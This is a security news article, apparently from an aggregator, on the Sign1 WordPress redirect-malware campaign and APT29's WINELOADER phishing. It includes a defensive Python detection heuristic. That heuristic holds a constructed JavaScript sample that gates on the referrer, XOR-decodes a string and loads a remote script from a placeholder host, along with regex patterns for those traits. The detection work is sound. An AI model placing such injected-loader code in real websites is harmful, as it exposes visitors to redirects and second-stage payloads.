Sophisticated Malware Campaign Targets WordPress Sites and Diplomatic Entities

A malware campaign known as Sign1 has compromised over 39,000 WordPress sites by injecting malicious JavaScript to redirect users to scam sites. At the same time, a separate cyber attack involving the WINELOADER backdoor targeted diplomatic entities with phishing emails linked to Russia’s Foreign Intelligence Service.

At a glance

  • Sign1 malware campaign targeting WordPress sites.
  • Malicious JavaScript injections redirect users to scam sites.
  • Sign1 malware facilitates redirects to VexTrio’s traffic distribution system.
  • Visitors to affected sites are redirected to scam sites.
  • APT29 cyber attack targeting diplomatic entities with WINELOADER backdoor.

The details

A sophisticated malware campaign known as Sign1 has been targeting WordPress sites, compromising over 39,000 websites in the last six months.

The malware utilizes malicious JavaScript injections to redirect users to scam sites, with the most recent variant infecting an estimated 2,500 sites in the past two months.

The attacks involve injecting rogue JavaScript into legitimate HTML widgets and plugins, using XOR-encoded JavaScript code that is decoded and executed from a remote server.

Sign1 Malware Operation

The Sign1 malware facilitates redirects to a traffic distribution system operated by VexTrio, employing time-based randomization to fetch dynamic URLs that change every 10 minutes.

Domains used in the attacks are registered shortly before their use, and the malware checks if visitors have come from major websites like Google, Facebook, Yahoo, and Instagram before executing.

Impact on Visitors

Visitors to affected sites are redirected to scam sites by executing additional JavaScript from the same server.

Since the second half of 2023, the Sign1 campaign has seen multiple iterations, with WordPress sites potentially compromised through brute-force attacks or exploiting security flaws in plugins and themes.

Malicious injections are often discovered inside WordPress custom HTML widgets, and attackers install a legitimate Simple Custom CSS and JS plugin to inject malicious code, allowing the malware to remain undetected for extended periods.
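The behaviours described above (referrer gating on Google/Facebook/Yahoo/Instagram, URLs rotated on a 10-minute schedule, XOR-decoded JavaScript that pulls a second script from a remote host, injected into custom HTML widgets or plugin-stored code) give a site owner something concrete to look for. The following Python heuristic is an added example written for this write-up, not code from Sucuri, Sign1 or any cited source; the sample widget contents are constructed, the regexes and the two-hit threshold are assumptions, and `600000` reflects an assumed millisecond encoding of the 10-minute interval.

```python
import re

# Constructed sample widget/plugin contents (not real Sign1 code). In a live
# check you would feed in the stored HTML from custom HTML widgets or the
# Simple Custom CSS and JS plugin's saved snippets (assumed storage locations).
SAMPLES = {
    "widget_benign": (
        "<script>document.getElementById('yr').textContent = "
        "new Date().getFullYear();</script>"
    ),
    "widget_suspicious": (
        "<script>var r=document.referrer;"
        "if(/google|facebook|yahoo|instagram/.test(r)){"
        "var t=Math.floor(Date.now()/600000);"           # 10-minute bucket (assumed form)
        "var k=7,s='';for(var i=0;i<c.length;i++){"
        "s+=String.fromCharCode(c.charCodeAt(i)^k);}"     # XOR decode loop
        "var x=document.createElement('script');"
        "x.src='https://example.invalid/'+t+'.js';"       # placeholder host
        "document.head.appendChild(x);}</script>"
    ),
}

# Heuristics derived from the traits the article describes; patterns are assumptions.
INDICATORS = {
    # referrer read, followed within 200 chars by one of the named referrer sites
    "referrer_gate": re.compile(
        r"document\.referrer.{0,200}(google|facebook|yahoo|instagram)", re.S),
    # current time divided into 600000 ms = 10 minute buckets
    "ten_minute_bucket": re.compile(
        r"(Date\.now\(\)|getTime\(\))\s*/\s*600000"),
    # per-character XOR over a string, the classic inline decoder shape
    "xor_decode_loop": re.compile(r"charCodeAt\([^)]*\)\s*\^"),
    # dynamically created script element used to load a second stage
    "remote_script_load": re.compile(r"createElement\(['\"]script['\"]\)"),
}


def score_snippet(html: str) -> dict:
    """Return the matched indicator names; two or more is treated as suspicious."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    return {"hits": hits, "suspicious": len(hits) >= 2}


def scan(samples: dict) -> dict:
    """Score every stored snippet so the noisy ones can be reviewed by hand."""
    return {name: score_snippet(body) for name, body in samples.items()}
```

A single hit (for example a referrer check in a legitimate analytics snippet) is not evidence on its own; the point is to surface widget and plugin entries that combine several of these traits for manual review.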

In a separate cyber attack incident, the WINELOADER backdoor was utilized in phishing attacks targeting diplomatic entities, with phishing emails containing wine-tasting lures.

The hacking group behind the attacks, known as Midnight Blizzard or APT29, has links to Russia’s Foreign Intelligence Service (SVR). The attacks targeted German political parties around February 26, 2024, using phishing emails bearing the logo of the Christian Democratic Union (CDU).

APT29 Cyber Attack

This marks the first time the APT29 cluster has targeted political parties. WINELOADER was first disclosed by Zscaler ThreatLabz last month as part of an ongoing cyber espionage campaign since at least July 2023. The attack chains leverage phishing emails with German-language lure content, invoking the malware through DLL side-loading using the legitimate sqldumper.exe.

WINELOADER has been employed in operations targeting diplomatic entities in multiple countries, with German prosecutors charging a military officer with espionage offenses for allegedly spying on behalf of Russian intelligence services.

These incidents highlight cyber attackers’ evolving tactics and the increasing sophistication of malware campaigns targeting WordPress sites and diplomatic entities, underscoring the importance of robust cybersecurity measures to protect against such threats.

Article X-ray

Facts attribution

This section links each of the article’s facts back to its original source.

If you suspect false information in the article, you can use this section to investigate where it came from.

securityweek.com
– Sign1 malware campaign has compromised over 39,000 WordPress sites in the last six months
– The malware uses malicious JavaScript injections to redirect users to scam sites
– The most recent variant of the malware has infected an estimated 2,500 sites in the past two months
– The attacks involve injecting rogue JavaScript into legitimate HTML widgets and plugins
– The malware uses XOR-encoded JavaScript code that is decoded and executed from a remote server
– The malware facilitates redirects to a VexTrio-operated traffic distribution system
– The malware uses time-based randomization to fetch dynamic URLs that change every 10 minutes
– Domains used in attacks are registered a few days prior to their use
– The malware checks if the visitor has come from major websites like Google, Facebook, Yahoo, Instagram before executing
– Site visitors are taken to scam sites by executing another JavaScript from the same server
– The Sign1 campaign has seen several iterations since the second half of 2023
– WordPress sites may have been taken over by brute-force attacks or exploiting security flaws in plugins and themes
– Malicious injections are often found inside WordPress custom HTML widgets
– Attackers install a legitimate Simple Custom CSS and JS plugin to inject malicious code
– This approach allows the malware to stay undetected for extended periods of time
thehackernews.com
– The WINELOADER backdoor was used in recent cyber attacks targeting diplomatic entities with wine-tasting phishing lures
– The hacking group behind the attacks has links to Russia’s Foreign Intelligence Service (SVR)
– The group responsible for the attacks is known as Midnight Blizzard (aka APT29, BlueBravo, or Cozy Bear)
– The malware was used to target German political parties with phishing emails bearing a logo from the Christian Democratic Union (CDU) around February 26, 2024
– This is the first time the APT29 cluster has targeted political parties
– WINELOADER was first disclosed by Zscaler ThreatLabz last month as part of a cyber espionage campaign ongoing since at least July 2023
– The attack chains leverage phishing emails with German-language lure content
– The malware is invoked via a technique called DLL side-loading using the legitimate sqldumper.exe
– WINELOADER has been employed in an operation targeting diplomatic entities in multiple countries
– The first-stage malware’s expanded use to target German political parties is a noted departure from the typical diplomatic focus of the APT29 subcluster
– German prosecutors have charged a military officer with espionage offenses after he was allegedly caught spying on behalf of Russian intelligence services
